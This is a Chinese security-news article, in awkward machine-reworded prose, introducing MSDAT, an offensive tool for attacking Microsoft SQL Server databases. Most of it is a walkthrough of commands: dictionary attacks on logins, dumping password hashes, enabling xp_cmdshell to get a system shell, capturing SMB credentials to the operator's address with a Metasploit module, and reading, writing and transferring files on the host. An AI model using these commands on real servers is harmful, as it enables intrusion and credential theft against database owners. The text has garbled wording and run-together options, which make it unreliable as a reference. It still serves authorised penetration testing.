快捷搜索:  网络  渗透  后门  CVE  扫描  木马  黑客  as

MSDAT:一款专程针对Microsoft SQL数据库的渗透排泄测试工具

今天给人人先容的是一款名鸣MSDAT(Microsoft SQL Database Attacking Tool)的工具,MSDAT是一款开源的渗透排泄测试工具,研究人员可行使MSDAT来对Microsoft SQL数据库的安全性进行遥程测试。

1.png

MSDAT使用处景:

有一个需要遥程监听的Microsoft数据库,你想要找到可以用来跟这个数据库连接的有用凭据

你拿到了一个有用的连接凭据,你想要抬举该账号的权限

你拿到了一个有用的连接凭据,你想要在托管该数据库的主机上执行命令(xp_cmdshell)

注:该工具已在Microsoft SQL Database 200五、2008以及2012版本上成功测试。

功能先容

在MSDAT的帮助下,你可以完成下列目标:

-在无需通过身份验证的情形下获取目标MSSQL数据库的手艺信息(例如数据库版本);

-通过字典攻击搜索MSSQL账号;

-测试登录凭据;

-拿到数据库服务器的Windows shell(xp_cmdshell);

-遥程下载/上传文件;

-获取SMB凭据;

-窃取MSSQL哈希暗码;

-扫描数据库端口;

-遥程执行SQL要求;

-获取主机文件/目录;

-创建文件夹;

工具装置

在运行MSDAT之前,你需要装置某些依靠组件。

Ubuntu:

sudo apt-get install freetds-dev

或直接从http://www.freetds.org/下载:

sudo pip install cython colorlog termcolor pymssql argparse
sudo pip install argcomplete && sudo activate-global-python-argcomplete

在freetds设置文件(/etc/freetds/freetds.conf或/usr/local/etc/freetds.conf)中添加”usentlmv2 = yes”,例如:

[global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes

使用样例

获取所有模块:

./msdat.py -h

列举模块所有功能以及选项(例如:all):

./msdat.py all -h

注:你可以使用“–test-module“选项来查看特定模块是否适用于目标MSSQL数据库。

all模块

all模块可以直接运行MSDAT的所有模块:

python msdat.py all -s $SERVER

下面命令可以完成:

-行使字典攻击测试帐号凭据;

-测试目标账号的暗码;

-定义timeout值;

./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10--force-retry

注:在每个模块中,你可以行使“–charset“选项来义所要使用的字符集。

mssqlinfo模块

在无需通过身份验证的情形下获取目标MSSQL数据库的手艺信息:

./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

passwordguesser模块

这个模块可以搜索有用凭据:

./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--force-retry –search

你还可以指定帐号文件:

./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt--force-retry

passwordstealer模块

导出哈希暗码:

./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump--save-to-file test.txt

xpcmdshell模块

行使xpcmdshell模块执行体系命令:

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shell

要是没有启用xpcmdshell的话,你可以行使“–enable-xpcmdshell“来激活模块:

./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell–disable-xpcmdshell –disable-xpcmdshell –shell

smbauthcapture模块

获取SMB凭据:

./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture$MY_IP_ADDRESS --share-name SHARE

你还可以配合Metasploit的auxiliary/server/capture/smb模块一块儿使用:

msf> use auxiliary/server/capture/smb
msfauxiliary(smb) > exploit

oleautomation模块

这个模块可以读写数据库服务器中存储的文件:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--read-file 'C:\Users\Administrator\Desktop\temp.txt'

向目标文件遥程写入字符串:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'

文件下载:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file'C:\Users\Administrator\Desktop\temp.txt' temp.txt

文件上传:

./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-filetemp.txt 'C:\Users\Administrator\Desktop\temp.txt

其他

如需了解完备的模块使用要领,请直接走访MSDAT的【GitHub主页】以获取具体信息。

*参考来源:msdat,Alpha_pck编译,无线黑客

您可能还会对下面的文章感兴趣: